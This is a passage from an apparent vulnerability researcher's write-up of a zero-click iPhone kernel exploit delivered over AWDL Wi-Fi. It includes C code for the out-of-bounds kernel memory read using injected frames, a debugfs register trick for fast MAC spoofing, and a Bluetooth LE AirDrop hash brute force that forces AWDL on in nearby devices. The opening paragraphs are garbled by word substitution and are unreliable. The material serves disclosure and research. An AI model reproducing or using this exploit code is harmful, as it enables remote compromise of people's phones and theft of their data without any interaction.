Energetic video display mode allows you to inject and video display arbitrary frames as in vogue, excluding in full of life video display mode (as against contemporary video display mode) the adaptor will aloof ACK frames in the event that they’re being despatched to its MAC take care of.

The Mediatek MT76 chipset modified into the most spirited one I could presumably perchance perchance fetch with a USB adaptor that helps this option. I provided a bunch of MT76-basically based adaptors and the most spirited one the put I could presumably perchance perchance undoubtedly catch this option to work modified into the ZyXEL NWD6605 which uses an mt76x2u chipset.

The one difficulty modified into that I could presumably perchance perchance only catch Energetic Show screen Mode to essentially work when working at 12 Mbps on a 5GHz channel nonetheless my present setup modified into the utilization of adaptors which had been now unable to 5GHz injection.

I had tried upright support at the starting of the exploit pattern direction of to catch 5GHz injection and monitoring to work; after attempting for a week with hundreds adaptors and building many, many branches of kernel drivers and twiddling with radiotap headers I had given up and made up our minds to be aware of getting one thing working on 2.4GHz with my aged adaptors.

This time round I loyal provided all of the adaptors I could presumably perchance perchance fetch which looked enjoy they would perchance presumably also simply have even the remotest probability of working and tried again.

One amongst the challenges is that OEMs can also simply no longer consistently utilize the identical chipset or revision of chipset in a instrument, that means getting defend of a specific chipset and revision is mostly a success-and-miss direction of.

Listed right here are all of the adaptors which I faded for the period of this exploit to set up out to search out enhance for the ingredients I wished:

All the WiFi adaptors tested during this exploit development process, from top left to bottom right: D-Link DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Link DWA-171, Vivanco 36665, tp-link Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-link AC1300

In the end I required two different adaptors to get the features I wanted:

Active monitor mode and frame injection: ZyXEL NWD6605 using mt76x2u driver

Monitor mode (including management and ACK frames): Netgear A6210 using rtl8812au driver

With this setup I was able to get frame injection, monitor mode sniffing of all frames (including management and ACK frames) as well as Active monitor mode to work at 12 Mbps on channel 44.

You can enable the feature like this:

ip link set dev wlan1 down
iw dev wlan1 set type monitor
iw dev wlan1 set monitor active control otherbss
ip link set dev wlan1 up
iw dev wlan1 set channel 44

We can change the card's MAC address using the ip tool like this:

ip link set dev wlan1 down
ip link set wlan1 address 44:44:22:22:22:22
ip link set dev wlan1 up

Changing the MAC address like this takes at least a second and the interface has to be down. Since we're trying to make these reads as fast as possible I decided to take a look at how this MAC address changing actually worked to see if I could speed it up...

3 ways to set a MAC: 1 - ioctl

The old way to set a network device MAC address is to use the SIOCSIFHWADDR ioctl:

struct ifreq ifr = {0};
uint8_t mac[6] = {0x22, 0x23, 0x24, 0x00, 0x00, 0x00};
memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);
int s = socket(AF_INET, SOCK_DGRAM, 0);
strcpy(ifr.ifr_name, "wlan1");
ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER;
int ret = ioctl(s, SIOCSIFHWADDR, &ifr);
printf("ioctl retval: %d\n", ret);

This interface is deprecated and doesn't work at all with this driver.

3 ways to set a MAC: 2 - netlink

The current supported interface is netlink. It took a whole day to learn enough about netlink to write a standalone PoC to change a MAC address. Netlink is presumably very powerful but also quite obtuse. And even after all that (perhaps unsurprisingly) it's no faster than the command line tool, which is really just making these same netlink API calls too.

Check out change_mac_nl.c in the released exploit source code to see the netlink code.

3 ways to set a MAC: 3 - hacker

Trying to do this the supported way has failed; it's just way too slow. But thinking about it, what is the MAC anyway? It's almost certainly just some field stored in flash or RAM on the chipset and indeed, diving in to the mt76x2u linux kernel driver source and tracing the functions which set the MAC address, we can see that it ends up writing to some configuration registers on the chip:

#define MT_MAC_ADDR_DW0 0x1008
#define MT_MAC_ADDR_DW1 0x100c

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)
{
  static const u8 null_addr[ETH_ALEN] = {};
  int i;

  ether_addr_copy(dev->mt76.macaddr, addr);

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {
    eth_random_addr(dev->mt76.macaddr);
    dev_info(dev->mt76.dev,
             "Invalid MAC address, using random address %pM\n",
             dev->mt76.macaddr);
  }

  mt76_wr(dev,
          MT_MAC_ADDR_DW0,
          get_unaligned_le32(dev->mt76.macaddr));
  mt76_wr(dev,
          MT_MAC_ADDR_DW1,
          get_unaligned_le16(dev->mt76.macaddr + 4) |
            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));
   …

I wonder if I could just write directly to those configuration registers? Would it completely blow up? Or would it just work? Is there an easy way to do this or will I actually have to patch the driver?

Looking around the driver a bit we can see it has a debugfs interface. Debugfs is a very neat way for drivers to easily expose lots of internal stuff out to userspace, restricted to root, for logging and monitoring as well as for messing around with:

root@raspberrypi:/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower

What we're after is a way to write to arbitrary control registers, and these two debugfs files let you do exactly that:

# cat regidx

0

# cat regval

0x76120044

If you write the address of the configuration register you want to read or write to the regidx file as a decimal value, then reading or writing the regval file lets you read or write that configuration register as a 32-bit hexadecimal value. Note that exposing configuration registers this way is a feature of this particular driver's debugfs interface, not a generic feature of debugfs. With this we can completely skip the netlink interface and the requirement to bring the device down and instead directly manipulate the internal state of the adaptor.

I replace the netlink code with this:

void mt76_debugfs_change_mac(char* phy_str, struct ether_addr new_mac) {
    // view the 6-byte MAC as two 32-bit words (the upper two bytes stay zero)
    union mac_dwords {
      struct ether_addr new_mac;
      uint32_t dwords[2];
    } data = {0};

    data.new_mac = new_mac;

    char lower_dword_hex_str[16] = {0};
    snprintf(lower_dword_hex_str, 16, "0x%08x\n", data.dwords[0]);

    char upper_dword_hex_str[16] = {0};
    snprintf(upper_dword_hex_str, 16, "0x%08x\n", data.dwords[1]);

    char* regidx_path = NULL;
    asprintf(&regidx_path,
             "/sys/kernel/debug/ieee80211/%s/mt76/regidx",
             phy_str);

    char* regval_path = NULL;
    asprintf(&regval_path,
             "/sys/kernel/debug/ieee80211/%s/mt76/regval",
             phy_str);

    // 4104 == 0x1008 (MT_MAC_ADDR_DW0), 4108 == 0x100c (MT_MAC_ADDR_DW1)
    file_write_string(regidx_path, "4104\n");
    file_write_string(regval_path, lower_dword_hex_str);

    file_write_string(regidx_path, "4108\n");
    file_write_string(regval_path, upper_dword_hex_str);

    free(regidx_path);
    free(regval_path);
}

and... it works! The adaptor instantly starts ACKing frames to whichever MAC address we write in to the MAC address field in the adaptor's configuration registers.
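To make the register values concrete, here is a minimal Python sketch of the same packing step. It is an illustration rather than code from the released exploit: the function name `mac_to_register_writes` is made up, and it assumes a little-endian host so that the C union above lays the MAC out the same way. It mirrors the userspace C code, not the driver's additional `U2ME` mask bits.

```python
import struct

# Register addresses taken from the mt76 driver excerpt above.
MT_MAC_ADDR_DW0 = 0x1008
MT_MAC_ADDR_DW1 = 0x100C


def mac_to_register_writes(mac: str):
    """Return [(regidx_text, regval_text), ...] for a MAC like '22:22:aa:22:00:01'.

    Hypothetical helper: the strings are what would be written to the
    regidx and regval debugfs files, in that order.
    """
    octets = bytes(int(part, 16) for part in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected six colon-separated octets")
    # Pad to 8 bytes and read two little-endian 32-bit words, mirroring a
    # union of struct ether_addr with uint32_t[2] on a little-endian host.
    dw0, dw1 = struct.unpack("<II", octets + b"\x00\x00")
    return [
        (f"{MT_MAC_ADDR_DW0}\n", f"0x{dw0:08x}\n"),  # regidx is decimal
        (f"{MT_MAC_ADDR_DW1}\n", f"0x{dw1:08x}\n"),  # regval is hex
    ]
```

Calling `mac_to_register_writes("22:22:aa:22:00:01")` yields the decimal register indices 4104 and 4108 paired with the two hex words, which is the same sequence of writes the C function performs.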

All that's then required is a rewrite of the early read code:

Now it starts out steering 8 stalled peers. Each time a read is requested, if there is still time left before steering will time out and there are still stalled peers, one stalled peer is chosen, has its steering_msg_blob pointer corrupted with the read target and gets unstalled. The target will start sending UMIs to that peer; we set the correct MAC address on the active monitor device, sniff the UMI and ACK it to stop the peer sending more. From the UMI we extract the value from TLV 0x1d and get the disclosed kernel memory.

If there are no more stalled peers, or steering has timed out, we wait a safe amount of time until we're able to restart all 8 peers and start again:

struct ether_addr reader_peers[8];

struct early_read_params {
    struct ether_addr dst;
    char* phy_str;
} er_para;

void init_early_read(struct ether_addr dst, char* phy_str) {
  er_para.dst = dst;
  er_para.phy_str = phy_str;

  reader_peers[0] = *(ether_aton("22:22:aa:22:00:00"));
  reader_peers[1] = *(ether_aton("22:22:aa:22:00:01"));
  reader_peers[2] = *(ether_aton("22:22:aa:22:00:02"));
  reader_peers[3] = *(ether_aton("22:22:aa:22:00:03"));
  reader_peers[4] = *(ether_aton("22:22:aa:22:00:04"));
  reader_peers[5] = *(ether_aton("22:22:aa:22:00:05"));
  reader_peers[6] = *(ether_aton("22:22:aa:22:00:06"));
  reader_peers[7] = *(ether_aton("22:22:aa:22:00:07"));
}

// state required between early reads:
uint64_t steering_begin_timestamp = 0;
int n_steered_peers = 0;

void* try_early_read(uint64_t kaddr, size_t* out_size) {
  struct ether_addr peer_b = *(ether_aton("22:22:bb:22:00:00"));
  int n_peers = 8;
  struct ether_addr reader_peer;
  int should_restart_steering = 0;

  // what phase are we in?
  uint64_t milliseconds_since_last_steering =
    (now_nanoseconds() - steering_begin_timestamp) /
    (1ULL*1000ULL*1000ULL);

  if (milliseconds_since_last_steering < 5000 &&
      n_steered_peers < n_peers) {
    // if less than 5 seconds have elapsed since we started steering
    // and we haven't reached the peer limit, then steer the next peer
    reader_peer = reader_peers[n_steered_peers++];
  } else if (milliseconds_since_last_steering < 8000) {
    // wait for the steering machine to time out so we can restart it
    usleep((8000 - milliseconds_since_last_steering) * 1000);
    should_restart_steering = 1;
  } else {
    // more than 8 seconds have already elapsed since we last
    // started steering (or we've never started it) so restart
    should_restart_steering = 1;
  }

  if (should_restart_steering) {
    // make reader peers suitable for bss steering
    n_steered_peers = 0;
    for (int i = 0; i < n_peers; i++) {
      inject(RT(),
          WIFI(er_para.dst, reader_peers[i]),
          AWDL(),
          SYNC_PARAMS(),
          CHAN_SEQ_EMPTY(),
          HT_CAPS(),
          UNICAST_DATAPATH(0x1307 | 0x800),
          PKT_END());
    }

    inject(RT(),
           WIFI(er_para.dst, peer_b),
           AWDL(),
           SYNC_PARAMS(),
           HT_CAPS(),
           UNICAST_DATAPATH(0x1307),
           BSS_STEERING_0(reader_peers, n_peers),
           PKT_END());

    steering_begin_timestamp = now_nanoseconds();
    reader_peer = reader_peers[n_steered_peers++];
  }

  char overflower[128] = {0};
  *(uint64_t*)(&overflower[0x50]) = kaddr;

  // set the card's MAC to ACK the UMI from the target
  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

  inject(RT(),
      WIFI(er_para.dst, reader_peer),
      AWDL(),
      SYNC_PARAMS(),
      SERV_PARAM(),
      HT_CAPS(),
      DATAPATH(reader_peer),
      SYNC_TREE((struct ether_addr*)overflower,
                sizeof(overflower)/sizeof(struct ether_addr)),
      PKT_END());

  // try to receive a UMI:
  void* steering_tlv = try_get_TLV(0x1d);

  if (steering_tlv) {
    struct mini_tlv {
      uint8_t type;
      uint16_t len;
    } __attribute__((packed));

    *out_size = ((struct mini_tlv*)steering_tlv)->len + 3;
  } else {
    printf("didn't get TLV\n");
  }

  // NULL out the bsssteering blob
  char null_overflower[128] = {0};

  inject(RT(),
      WIFI(er_para.dst, reader_peer),
      AWDL(),
      SYNC_PARAMS(),
      SERV_PARAM(),
      HT_CAPS(),
      DATAPATH(reader_peer),
      SYNC_TREE((struct ether_addr*)null_overflower,
                sizeof(null_overflower)/sizeof(struct ether_addr)),
      PKT_END());

  // the active monitor interface doesn't always manage to ACK
  // the first frame, give it a chance
  usleep(1*1000);

  return steering_tlv;
}
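The phase decision at the top of try_early_read can be isolated as a tiny pure function, which makes the timing logic easier to reason about. This is a sketch only: the 5 second and 8 second thresholds come from the comments in the listing above, while the function name `next_phase` and the action labels are invented for illustration.

```python
STEER_WINDOW_MS = 5000   # "less than 5 seconds" in the listing's comments
RESTART_AFTER_MS = 8000  # "more than 8 seconds" in the listing's comments
MAX_PEERS = 8            # number of reader peers set up by init_early_read


def next_phase(ms_since_steering: int, n_steered_peers: int):
    """Return (action, sleep_ms) for the next early read.

    action is "steer_next_peer" when a stalled peer can still be used,
    otherwise "restart_steering"; sleep_ms is how long to wait first.
    """
    if ms_since_steering < STEER_WINDOW_MS and n_steered_peers < MAX_PEERS:
        return ("steer_next_peer", 0)
    if ms_since_steering < RESTART_AFTER_MS:
        # Let the target's steering state machine time out before restarting.
        return ("restart_steering", RESTART_AFTER_MS - ms_since_steering)
    # Steering timed out long ago, or was never started.
    return ("restart_steering", 0)
```

Keeping the decision separate from the frame injection means it can be checked without any radio hardware; the actual exploit interleaves both in one function.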

With some luck we can bootstrap the faster read primitive with 8 or fewer early reads, meaning that on an iPhone 11 Pro with AWDL enabled popping calc now looks like this:

In this demo AWDL has been manually enabled by opening the sharing panel in the Photos app. This keeps the AWDL interface active. The exploit gains arbitrary kernel memory read and write within a few seconds and is able to inject a signal into a userspace process to cause it to JOP to a single gadget which opens Calculator.app

I mentioned that AWDL has to be enabled; it isn't always on. In order to make this an interactionless zero-click exploit which can target any device in radio proximity we therefore need a way to force devices to enable their AWDL interface.

AWDL is used for many things. For example, my iPhone seems to turn on AWDL when it receives a voicemail because it really wants to Airplay the voicemail to my Apple TV. But sending someone a voicemail requires their phone number, and we're looking for an attack which requires no identifiers or non-default settings.

The second research paper from the SEEMOO labs team demonstrated an attack to enable AWDL using Bluetooth low energy advertisements to force arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn't publish their code for this attack so I decided to recreate it myself.

In the iOS Photos app, when you select the sharing dialog and click "Airdrop", a list of nearby iOS and MacOS devices appears, all of which you can send your photo to. Most people don't want random passers-by sending them unsolicited photos so the default AirDrop sharing setting is "Contacts Only", meaning you will only see AirDrop sharing requests from users in your contacts book. But how does this work? For an in-depth discussion, check out the SEEMOO labs paper.

When a device wants to share a file via AirDrop it starts broadcasting a bluetooth low-energy advertisement which looks like this example, broadcast by MacOS:

[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] >

BLE advertisements are small; they have a maximum payload size of 31 bytes. The bundle of bytes at the end are actually four truncated 2-byte SHA256 hashes of the contact details of the device which is trying to share something. The contact details used are the email addresses and phone numbers associated with the device's logged-in iCloud account. You can generate the same truncated hashes like this:

In this case I'm using a test account with the iCloud email address: 'chris.donut1981@icloud.com'

>>> import hashlib
>>> s = 'chris.donut1981@icloud.com'
>>> hashlib.sha256(s.encode('utf-8')).hexdigest()[:4]
'62b3'

Notice that this matches the two penultimate bytes in the advertisement frame shown above. The contact hashes are unsalted, which can have some fun consequences should you live in a country with localized mobile phone numbers, but this is an understandable performance optimization.

All iOS devices are constantly receiving and processing BLE advertisement frames like this. In the case of these AirDrop advertisements, when the device is in the default "Contacts Only" mode, sharingd (which parses BLE advertisements) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the device's address book.

If a match is found this doesn't actually mean the sending device really is in the receiver's address book, just that there is a contact with a colliding hash. In order to resolve this the devices need to share more information and at this point the receiver enables AWDL to establish a higher-bandwidth communication channel.
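The matching step described above can be modelled in a few lines of Python. This is only a sketch of the behaviour as described in the text, not sharingd's implementation: the function names are made up, and it assumes each contact identifier is hashed exactly as given, with no normalisation of phone numbers or email case.

```python
import hashlib


def short_hash(identifier: str) -> str:
    """First two bytes (four hex digits) of the unsalted SHA256 of an identifier."""
    return hashlib.sha256(identifier.encode("utf-8")).hexdigest()[:4]


def advert_matches_contacts(advert_hashes, contacts) -> bool:
    """Model of the "Contacts Only" check.

    advert_hashes: the truncated hashes carried in one advertisement.
    contacts: the emails and phone numbers in the receiver's address book.
    A True result only means some contact collides with one of the
    truncated hashes, which per the text is enough to bring AWDL up.
    """
    known = {short_hash(contact) for contact in contacts}
    return any(h in known for h in advert_hashes)
```

Because only 16 bits of each hash are compared, an attacker does not need to know any real contact: any advertised value that happens to collide with an address book entry passes this first check.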

The SEEMOO labs paper continues in great detail about how the two devices then really verify that the sender is in the receiver's address book, but we are only interested in getting AWDL enabled so we're done. As long as we keep broadcasting the advertisement with the colliding hash the target's AWDL interface will remain active.

The SEEMOO labs team paper discusses the custom firmware they wrote for a BBC micro:bit so I picked up a few of those:

The BBC micro:bit is an education-focused dev board. This photo shows the rear of the board; the front has a 5x5 LED matrix and two buttons. They cost under $20.

These devices are intended for the education/maker market. It's a Nordic nRF51822 SOC with a Freescale KL26 acting as a USB programmer for the nRF51. BBC provide a small programming environment for it, but you can build any firmware image for the nRF51, plug in the micro:bit (which appears as a mass-storage device thanks to the KL26) and drag and drop the firmware image on there. The programmer chip flashes the nRF51 for you and you can run your code. This is the device which the SEEMOO labs team used and wrote a custom firmware for.

Whilst playing around with the micro:bit I discovered the MIRAGE project, a generic and amazingly well documented project for doing all manner of radio security research. Their tools have a firmware for the micro:bit, and indeed, dropping their provided firmware image on to the micro:bit and running this:

sudo ./mirage_launcher ble_sniff SNIFFING_MODE=advertisements INTERFACE=microbit0

we're able to start sniffing BLE advertisements:

[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] >

Indeed, if you do this at home you'll likely see a barrage of BLE traffic from everything you can imagine. Apple devices are particularly chatty; see the frames sent whenever your Airpods case is opened and closed.

If we take a look at a couple of captured BTLE frames when we try to share a file via AirDrop, we can see there's clearly structure in there:

MacOS:

data=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

data=02011a020a070eff4c000f05a035c928291002710c

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

Certainly looks like more TLVs! With some reversing in sharingd we can figure out what these types are:

“Invalid” 0x0

“Hash” 0x1

“Company” 0x2

“AirPrint” 0x3

“ATVSetup” 0x4

“AirDrop” 0x5

“HomeKit” 0x6

“Prox” 0x7

“HeySiri” 0x8

“AirPlayTarget” 0x9

“AirPlaySource” 0xa

“MagicSwitch” 0xb

“Continuity” 0xc

“TetheringTarget” 0xd

“TetheringSource” 0xe

“NearbyAction” 0xf

“NearbyInfo” 0x10

“WatchSetup” 0x11

MacOS is sending AirDrop messages in the BLE advertisements. iOS is sending NearbyAction and NearbyInfo messages.
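The layout annotated above (length, 0xff manufacturer data, the 4c00 Apple company ID, then type/length/value triples) can be decoded with a short parser. This is a sketch written for this explanation, not code from MIRAGE or the exploit; the function names are made up and the `TYPE_NAMES` table only includes the three types seen in the two captured frames.

```python
APPLE_COMPANY_ID = 0x004C  # appears little-endian as "4c00" in the frames
TYPE_NAMES = {0x05: "AirDrop", 0x0F: "NearbyAction", 0x10: "NearbyInfo"}


def parse_ad_structures(adv: bytes):
    """Split a BLE advertising payload into (ad_type, data) pairs."""
    out, i = [], 0
    while i < len(adv):
        length = adv[i]
        if length == 0 or i + 1 + length > len(adv):
            break  # padding or a truncated structure
        out.append((adv[i + 1], adv[i + 2:i + 1 + length]))
        i += 1 + length
    return out


def parse_apple_tlvs(adv: bytes):
    """Return (type, value) pairs from Apple manufacturer-specific data."""
    tlvs = []
    for ad_type, data in parse_ad_structures(adv):
        if ad_type != 0xFF or len(data) < 2:
            continue  # not manufacturer-specific data
        if int.from_bytes(data[:2], "little") != APPLE_COMPANY_ID:
            continue
        i = 2
        while i + 2 <= len(data):
            tlv_type, tlv_len = data[i], data[i + 1]
            tlvs.append((tlv_type, data[i + 2:i + 2 + tlv_len]))
            i += 2 + tlv_len
    return tlvs
```

Fed the MacOS frame, this returns a single type 0x05 (AirDrop) entry whose 18-byte value ends with the four 2-byte contact hashes and a trailing zero byte; the iOS 13 frame yields a 0x0f (NearbyAction) entry followed by a 0x10 (NearbyInfo) entry.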

For testing purposes we want some contacts on the device. Like the SEEMOO labs paper I generated 100 random contacts using a modified version of the AppleScript in this StackOverflow answer. Each contact has 4 contact identifiers: home and work email, home and work phone numbers.

We can also use MIRAGE to prototype brute forcing through the 16 bit space of truncated contact hashes. I wrote a MIRAGE module to broadcast Airdrop advertisements with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn't support arbitrary broadcast frame injection but it can use the Raspberry Pi 4's built-in bluetooth controller. Running it for a while and looking at the console output from the iPhone we see some helpful log messages showing up in Console.app:

Hashing: Error: failed to get contactsContainsShortHashes because (ratelimited)

The SEEMOO paper mentioned that they were able to brute force a truncated hash in a few seconds but it seems Apple have now added some rate limiting.

Spoofing different BT source MAC addresses didn't help, but slowing the brute force attempts to one every 2 seconds or so seemed to please the rate limiting and in around 30 seconds, with reasonable luck, AWDL gets enabled and MI and PSF frames start to appear on the AWDL social channels.
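As a rough sanity check on that timing, the chance of hitting a colliding hash can be estimated with a little arithmetic. This is a back-of-the-envelope sketch with several assumptions that are not stated in the text: that the 100 test contacts produce 400 distinct, uniformly distributed truncated hashes, that every advertisement carries four previously untried candidate values, and that one advertisement is sent every 2 seconds. The function name is made up.

```python
def hit_probability(n_adverts, contact_hashes=400, hashes_per_advert=4,
                    space=1 << 16):
    """Chance that at least one of the first n_adverts carries a colliding hash.

    Models sweeping distinct candidate values through the 16-bit space
    (sampling without replacement) against contact_hashes distinct targets.
    """
    tried = min(n_adverts * hashes_per_advert, space)
    p_miss = 1.0
    for k in range(tried):
        # Probability the next untried value also misses every target.
        p_miss *= max(space - contact_hashes - k, 0) / (space - k)
    return 1.0 - p_miss
```

Under these assumptions `hit_probability(15)` corresponds to 30 seconds of brute forcing at one advertisement every 2 seconds; a real address book with more or fewer identifiers shifts the estimate accordingly.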

As long as we keep broadcasting the same advertisement with the matching contact hash the AWDL interface will remain active. I didn't want to keep MIRAGE as a dependency so I ported the python prototype to use the linux native libbluetooth library and hci_send_cmd to build custom advertisement frames:

uint8_t payload[] = {0x02, 0x01, 0x06,  // flags AD structure
                     0x17,              // length of the next AD structure
                     0xff,              // manufacturer-specific data
                     0x4c, 0x00,        // Apple company ID
                     0x05,              // type: AirDrop
                     0x12,              // length of the AirDrop value
                     0x00, 0x00, 0x00, 0x00,
                     0x00, 0x00, 0x00, 0x00, 0x01,
                     hash1[0], hash1[1],
                     hash2[0], hash2[1],
                     hash3[0], hash3[1],
                     hash4[0], hash4[1],
                     0x00};

le_set_advertising_data_cp data = {0};
data.length = sizeof(payload);
memcpy(data.data, payload, sizeof(payload));

hci_send_cmd(handle,
             OGF_LE_CTL,
             OCF_LE_SET_ADVERTISING_DATA,
             sizeof(payload)+1,
             &data);
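For prototyping without a Bluetooth controller, the same byte layout can be assembled in Python and compared against a captured frame. This is a sketch only: `airdrop_advert` is a made-up helper that mirrors the C array above and does not talk to any hardware.

```python
def airdrop_advert(hashes):
    """Build the AirDrop advertising payload for four 2-byte truncated hashes."""
    if len(hashes) != 4 or any(len(h) != 2 for h in hashes):
        raise ValueError("expected four 2-byte hashes")
    value = bytes(8) + b"\x01" + b"".join(hashes) + b"\x00"  # 18-byte AirDrop value
    body = bytes([0x4C, 0x00,            # Apple company ID, little-endian
                  0x05, len(value)]) + value  # type AirDrop, then its length
    payload = (bytes([0x02, 0x01, 0x06])      # flags AD structure
               + bytes([len(body) + 1, 0xFF])  # manufacturer-specific data
               + body)
    if len(payload) > 31:
        raise ValueError("BLE advertising payloads are limited to 31 bytes")
    return payload
```

Passing the four hashes from the MacOS capture shown earlier (fa5c, 2516, bf07, aba4) reproduces that frame byte for byte, which is a convenient check that the length fields are right before sending anything over the air.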

Combining the AWDL exploit and BLE brute-force, we get a new demo:

With the phone left idle on the home screen and no user interaction we force the AWDL interface to activate using BLE advertisements. The AWDL exploit gains kernel memory read/write a few seconds after starting and the entire end-to-end exploit takes around a minute.

There may well be better, faster ways to force-enable AWDL but for my demo this will do.

This demo is neat but doesn't really convey that we have compromised almost all of the user's data, with no interaction. We can read and write kernel memory remotely. I know that Apple has invested significant effort in "post-exploitation" hardening so I wanted to demonstrate that with just this single vulnerability these mitigations can be defeated to the point where I could run something like a real-world implant of the kind we have seen deployed in real-world exploitation against end users before. Trying to defend against an attacker with arbitrary memory read/write is a losing game, but there is a difference between saying that and you believing me, and proving it.

We will need to write a lot more arbitrary data for this final step, so we need the arbitrary write to be even faster. There is one more optimization left.

Due to the order in which loads and stores occur in actionFrameReport we were able to build a primitive which gave us a timestamp valid for up to 1024ms and a large n_frames_in_last_second value. We used that to do one arbitrary add, then restarted the whole setup: replaced upper_peer's timestamp with 0, sent another frame to get a fresh timestamp and so on.

But why can't we just keep using the first timestamp and bundle more writes together? We can; it's just important to take care that we don't exceed that 1024ms window. The exploit takes a very conservative approach here and uses only a few extra milliseconds. The reason is that we're running as a regular userspace program on a small system. We don't have anything like real-time scheduling guarantees. Linux sort-of supports running userspace programs on isolated cores to give something like a real-time experience, but for getting this demo exploit working it was sufficient to raise the priority of the exploit process with nice and leave a large safety window in the 1024ms. The code tries to bundle large buffer writes in chunks of 16, which gives a reasonable speed up.
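The bundling idea can be sketched as follows. This is an illustration of the scheduling logic only, not the exploit's write primitive: the helper names are made up, and the 512ms safety margin is a hypothetical placeholder since the text does not give the actual margin used.

```python
WINDOW_MS = 1024  # how long one timestamp stays valid, per the text above


def bundle_writes(writes, bundle_size=16):
    """Split pending writes into bundles that share a single fresh timestamp."""
    return [writes[i:i + bundle_size]
            for i in range(0, len(writes), bundle_size)]


def still_safe(elapsed_ms, safety_margin_ms=512):
    """True while the current timestamp can be reused for another write.

    safety_margin_ms is a hypothetical value; it stands in for the large
    safety window left to absorb scheduling jitter in userspace.
    """
    return elapsed_ms < WINDOW_MS - safety_margin_ms
```

With this shape, the setup cost of obtaining a fresh timestamp is paid once per bundle of 16 writes rather than once per write, at the price of having to abandon a bundle early if `still_safe` ever returns False.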

Way back when I released the first demo exploit, which disclosed random chunks of physical memory, I had taken a look at how the physmap works on iOS.

Linux, Windows and XNU all have physmaps; they are a very convenient way of manipulating physical memory when your code has paging enabled and can't directly manipulate physical memory any more.

Abstractly, physmaps are virtual mappings of all of physical memory

The physmap is (usually) a 1:1 virtual mapping of physical memory. You can see in the diagram how the physical memory at the bottom might be split up into different regions, with some of those regions currently mapped in the kernel virtual address space. Some other physical memory regions might, for example, be used for userspace processes.

The physmap is the large kernel virtual memory region shown towards the right of the virtual address space, which is the same size as the amount of physical memory. The pagetables which translate virtual memory accesses in this region are set up in such a way that any access at an offset into the physmap virtual region gets translated to that same offset from the base of physical memory.

The physmap in XNU isn't set up exactly like that. Instead they use a "segmented physical aperture". In practice this means that they set up a number of smaller "sub-physmaps" inside the physmap region and populate a table called the PTOV table to enable translation from a physical address to a virtual address inside the physmap region:

pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)

There is one other important physical region not captured in the PTOV table, which is the kernelcache image itself; this is found starting at gVirtBase and the kernel functions for translating between physical and physmap-virtual addresses take this into account.
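Translation through a table like this is a simple range lookup. The sketch below uses the rows dumped above as sample data; the function names are made up, and it deliberately ignores the kernelcache region at gVirtBase, so it is a model of the idea rather than a reimplementation of the kernel's translation functions.

```python
# (physical base, physmap virtual base, length) rows copied from the dump above.
PTOV_TABLE = [
    (0x000000080E978000, 0xFFFFFFF070928000, 0xDE03C000),
    (0x0000000808E14000, 0xFFFFFFF06ADE4000, 0x05B44000),
    (0x0000000801B80000, 0xFFFFFFF066000000, 0x04CB8000),
    (0x0000000808D04000, 0xFFFFFFF06ACF4000, 0x000F0000),
    (0x0000000808DF4000, 0xFFFFFFF06ACD4000, 0x00020000),
    (0x0000000808CEC000, 0xFFFFFFF06ACBC000, 0x00018000),
    (0x0000000808A80000, 0xFFFFFFF06ACB8000, 0x00004000),
    (0x0000000808DF4000, 0xFFFFFFF06ACF4000, 0x00000000),
]


def phys_to_physmap(pa):
    """Translate a physical address to its physmap virtual address, or None."""
    for base, kva, length in PTOV_TABLE:
        if base <= pa < base + length:
            return kva + (pa - base)
    return None  # not covered by any sub-physmap in this table


def physmap_to_phys(kva):
    """Inverse lookup: physmap virtual address back to a physical address."""
    for base, region_kva, length in PTOV_TABLE:
        if region_kva <= kva < region_kva + length:
            return base + (kva - region_kva)
    return None
```

Each row behaves like its own small 1:1 physmap: within a row the offset is preserved, but consecutive physical regions do not have to appear in the same order in virtual memory.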

The interesting thing is that the virtual protection of the pages in the physmap doesn't have to match the virtual protection of the pages as seen by a page table traversal from the perspective of a task. I wrote some test code using oob_timestamp to overwrite a portion of its own __TEXT segment via the physmap and it worked, allowing me to execute new native instructions. Could we execute userspace shellcode remotely by just writing directly into the physmap?

This works fine when prototyped using oob_timestamp modifying itself; but as soon as you try to use it to target a system process, it panics. Something else is going on.

The canonical resource for APRR is s1guza's blog post. It's a hardware customization by Apple to add an extra layer of indirection to page protection lookups via a control register. The page-tables alone are not sufficient to determine the runtime memory protection of a page.

APRR is used in the Safari JIT hardening and in the kernel it's used to implement PPL (Page Protection Layer). For an in-depth look at PPL check out Brandon Azad's recent blog post.

